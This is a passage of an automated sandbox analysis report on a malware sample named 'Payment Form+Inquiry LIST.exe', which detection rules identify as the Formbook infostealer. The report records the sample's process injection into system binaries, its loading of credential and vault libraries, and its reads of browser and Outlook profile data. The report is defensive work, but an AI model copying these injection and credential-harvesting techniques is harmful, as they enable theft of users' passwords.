            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_030070E97_2_030070E9
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F401007_2_02F40100
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F6C6E07_2_02F6C6E0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0300F7B07_2_0300F7B0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F4C7C07_2_02F4C7C0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F507707_2_02F50770
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F747507_2_02F74750
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_030016CC7_2_030016CC
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02FFE4F67_2_02FFE4F6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_030075717_2_03007571
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_030105917_2_03010591
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F414607_2_02F41460
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0300F43F7_2_0300F43F
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_030024467_2_03002446
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02FED5B07_2_02FED5B0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F505357_2_02F50535
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02FFDAC67_2_02FFDAC6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0300AB407_2_0300AB40
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02FEDAAC7_2_02FEDAAC
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F95AA07_2_02F95AA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F4EA807_2_02F4EA80
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0300FB767_2_0300FB76
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02FC3A6C7_2_02FC3A6C
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03006BD77_2_03006BD7
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F8DBF97_2_02F8DBF9
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03007A467_2_03007A46
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0300FA497_2_0300FA49
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F19B807_2_02F19B80
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F6FB807_2_02F6FB80
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F7E8F07_2_02F7E8F0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F538E07_2_02F538E0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F368B87_2_02F368B8
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0301A9A67_2_0301A9A6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F528407_2_02F52840
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F5A8407_2_02F5A840
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02FBD8007_2_02FBD800
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F529A07_2_02F529A0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F669627_2_02F66962
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F599507_2_02F59950
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F6B9507_2_02F6B950
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0300FF097_2_0300FF09
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F59EB07_2_02F59EB0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F62E907_2_02F62E90
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F50E597_2_02F50E59
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0300FFB17_2_0300FFB1
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F5CFE07_2_02F5CFE0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F13FD27_2_02F13FD2
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F13FD57_2_02F13FD5
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0300EE267_2_0300EE26
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F42FC87_2_02F42FC8
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F51F927_2_02F51F92
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0300CE937_2_0300CE93
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02FC4F407_2_02FC4F40
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F70F307_2_02F70F30
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F92F287_2_02F92F28
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0300EEDB7_2_0300EEDB
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F40CF27_2_02F40CF2
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02FF0CB57_2_02FF0CB5
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03001D5A7_2_03001D5A
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03007D737_2_03007D73
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02FC9C327_2_02FC9C32
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F50C007_2_02F50C00
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F4ADE07_2_02F4ADE0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F6FDC07_2_02F6FDC0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F68DBF7_2_02F68DBF
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F53D407_2_02F53D40
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0300FCF27_2_0300FCF2
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F5AD007_2_02F5AD00
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006D1A607_2_006D1A60
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006C13A17_2_006C13A1
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006EA4C07_2_006EA4C0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006D35807_2_006D3580
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006CCCA07_2_006CCCA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006CCC977_2_006CCC97
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006CCEC07_2_006CCEC0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006CAF407_2_006CAF40
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0330A39A7_2_0330A39A
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0330C06C7_2_0330C06C
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0330B0D87_2_0330B0D8
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0330BBB47_2_0330BBB4
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0330BCD37_2_0330BCD3
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: String function: 00007FF6E825D7A0 appears 64 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0515B970 appears 268 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 051B7E54 appears 88 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 051A5130 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 051EF290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 051DEA12 appears 85 times
            Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 02F97E54 appears 88 times
            Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 02F3B970 appears 268 times
            Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 02FBEA12 appears 85 times
            Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 02FCF290 appears 105 times
            Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 02F85130 appears 36 times
            Source: Payment Form+Inquiry LIST.exeBinary or memory string: OriginalFilename vs Payment Form+Inquiry LIST.exe
            Source: Payment Form+Inquiry LIST.exe, 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDISPATCHMETHODremoveModuleResolve.dlld" vs Payment Form+Inquiry LIST.exe
            Source: Payment Form+Inquiry LIST.exe, 00000000.00000002.1325838473.0000022621800000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDISPATCHMETHODremoveModuleResolve.dlld" vs Payment Form+Inquiry LIST.exe
            Source: Payment Form+Inquiry LIST.exeBinary or memory string: OriginalFilenameDISPATCHMETHODremoveModuleResolve.dlld" vs Payment Form+Inquiry LIST.exe
            Source: 3.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Payment Form+Inquiry LIST.exeStatic PE information: Section: .rsrc ZLIB complexity 0.996767869636194
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/1@14/9
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E8262B30 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,0_2_00007FF6E8262B30
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
            Source: C:\Windows\SysWOW64\findstr.exeFile created: C:\Users\user\AppData\Local\Temp\H0840I45Jump to behavior
            Source: Payment Form+Inquiry LIST.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3785973000.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1812938186.0000000002B37000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3785973000.0000000002B37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Payment Form+Inquiry LIST.exeVirustotal: Detection: 56%
            Source: Payment Form+Inquiry LIST.exeReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeFile read: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe "C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe"
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Payment Form+Inquiry LIST.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: Payment Form+Inquiry LIST.exeStatic file information: File size 1950720 > 1048576
            Source: Payment Form+Inquiry LIST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Payment Form+Inquiry LIST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Payment Form+Inquiry LIST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Payment Form+Inquiry LIST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Payment Form+Inquiry LIST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Payment Form+Inquiry LIST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Payment Form+Inquiry LIST.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Payment Form+Inquiry LIST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: findstr.pdbGCTL source: vbc.exe, 00000003.00000002.1580505880.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000002.3786167586.00000000014CE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: findstr.exe, 00000007.00000002.3790938279.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3792132594.000000000367C000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1922034773.000000002F70C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QYzBgoBGBcxProZWs.exe, 00000005.00000000.1504924676.00000000006CE000.00000002.00000001.01000000.00000005.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3782981021.00000000006CE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: findstr.pdb source: vbc.exe, 00000003.00000002.1580505880.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000002.3786167586.00000000014CE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1580674162.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1582748260.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, findstr.exe, 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1580674162.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1582748260.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: vbc.pdb source: findstr.exe, 00000007.00000002.3790938279.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3792132594.000000000367C000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1922034773.000000002F70C000.00000004.80000000.00040000.00000000.sdmp
            Source: Payment Form+Inquiry LIST.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Payment Form+Inquiry LIST.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Payment Form+Inquiry LIST.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Payment Form+Inquiry LIST.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Payment Form+Inquiry LIST.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: Payment Form+Inquiry LIST.exeStatic PE information: section name: .managed
            Source: Payment Form+Inquiry LIST.exeStatic PE information: section name: hydrated
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_004017BF push ds; iretd 3_2_00401B30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0040A8C2 push ss; iretd 3_2_0040A921
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0041A881 push esp; iretd 3_2_0041A882
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0041E8B7 push ss; ret 3_2_0041E8BD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_004051A1 push ebp; ret 3_2_004051A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_004019BF push ds; iretd 3_2_00401B30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_00401B31 push ds; iretd 3_2_00401B30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_00403500 push eax; ret 3_2_00403502
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0041CD8C push edx; iretd 3_2_0041CD8D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_00407643 pushfd ; iretd 3_2_0040765A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_00407638 pushfd ; iretd 3_2_0040765A
